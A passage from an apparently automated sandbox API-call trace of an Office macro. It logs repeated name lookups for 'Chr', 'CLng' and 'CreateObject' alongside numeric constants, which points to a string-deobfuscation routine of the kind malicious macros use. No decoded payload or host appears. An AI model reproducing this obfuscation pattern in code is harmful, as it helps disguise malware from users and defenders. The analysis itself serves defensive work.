lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H18BD") returned 7 [0058.975] VarI4FromStr (in: strIn="&H18BD", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="215876") returned 7 [0058.975] VarI4FromStr (in: strIn="215876", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H745") returned 6 [0058.975] VarI4FromStr (in: strIn="&H745", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.975] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="84840") returned 6 [0058.976] VarI4FromStr (in: strIn="84840", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H328") returned 6 [0058.976] VarI4FromStr (in: strIn="&H328", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.976] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1005438") returned 8 [0058.976] VarI4FromStr (in: strIn="1005438", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2362") returned 7 [0058.976] VarI4FromStr (in: strIn="&H2362", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.976] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="863830") returned 7 [0058.976] VarI4FromStr (in: strIn="863830", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1EAD") returned 7 [0058.976] VarI4FromStr (in: strIn="&H1EAD", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.978] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d94ad80, cb=0x258) returned 0x1d39d580de0 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="fff") returned 0x508e00 [0058.978] strcpy_s (in: _Dst=0x7ffce0c05050, _DstSize=0x100, _Src="fff" | out: _Dst="fff") returned 0x0 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="dfefef") returned 0x50a624 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="eee") returned 0x508881 [0058.978] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="eee" | out: _Dst="eee") returned 0x0 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="itelro") returned 0x503431 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="649152") returned 7 [0058.978] VarI4FromStr (in: strIn="649152", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.978] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1B90") returned 7 [0058.978] VarI4FromStr (in: strIn="&H1B90", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="666540") returned 7 [0058.979] VarI4FromStr (in: strIn="666540", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H16A4") returned 7 [0058.979] VarI4FromStr (in: strIn="&H16A4", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="338240") returned 7 [0058.979] VarI4FromStr (in: strIn="338240", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HBCC") returned 6 [0058.979] VarI4FromStr (in: strIn="&HBCC", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="15651") returned 6 [0058.979] VarI4FromStr (in: strIn="15651", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.979] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0058.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=5 | out: lpWideCharStr="&H8D") returned 5 [0058.980] VarI4FromStr (in: strIn="&H8D", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="879768") returned 7 [0058.980] VarI4FromStr (in: strIn="879768", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1FD2") returned 7 [0058.980] VarI4FromStr (in: strIn="&H1FD2", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="52325") returned 6 [0058.980] VarI4FromStr (in: strIn="52325", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H1C7") returned 6 [0058.980] VarI4FromStr (in: strIn="&H1C7", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1017986") returned 8 [0058.980] VarI4FromStr (in: strIn="1017986", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.980] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H21B3") returned 7 [0058.981] VarI4FromStr (in: strIn="&H21B3", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="377336") returned 7 [0058.981] VarI4FromStr (in: strIn="377336", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HE98") returned 6 [0058.981] VarI4FromStr (in: strIn="&HE98", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.981] atoi (_Str="8669") returned 8669 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H220B") returned 7 [0058.981] VarI4FromStr (in: strIn="&H220B", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="959197") returned 7 [0058.981] VarI4FromStr (in: strIn="959197", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2519") returned 7 [0058.981] VarI4FromStr (in: strIn="&H2519", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.981] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="630000") returned 7 [0058.982] VarI4FromStr (in: strIn="630000", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.982] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1482") returned 7 [0058.982] VarI4FromStr (in: strIn="&H1482", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.982] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="54136") returned 6 [0058.982] VarI4FromStr (in: strIn="54136", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.982] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0058.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H218") returned 6 [0058.982] VarI4FromStr (in: strIn="&H218", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0058.982] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d580de0, cb=0x4b0) returned 0x1d39da0e610 [0058.982] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="zzz") returned 0x50fbec [0058.982] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="733824") returned 7 [0059.013] VarI4FromStr (in: strIn="733824", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1B90") returned 7 [0059.013] VarI4FromStr (in: strIn="&H1B90", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="672336") returned 7 [0059.013] VarI4FromStr (in: strIn="672336", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H16A4") returned 7 [0059.013] VarI4FromStr (in: strIn="&H16A4", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="350320") returned 7 [0059.013] VarI4FromStr (in: strIn="350320", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HBCC") returned 6 [0059.013] VarI4FromStr (in: strIn="&HBCC", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.013] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="15792") returned 6 [0059.014] VarI4FromStr (in: strIn="15792", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.014] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=5 | out: lpWideCharStr="&H8D") returned 5 [0059.014] VarI4FromStr (in: strIn="&H8D", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 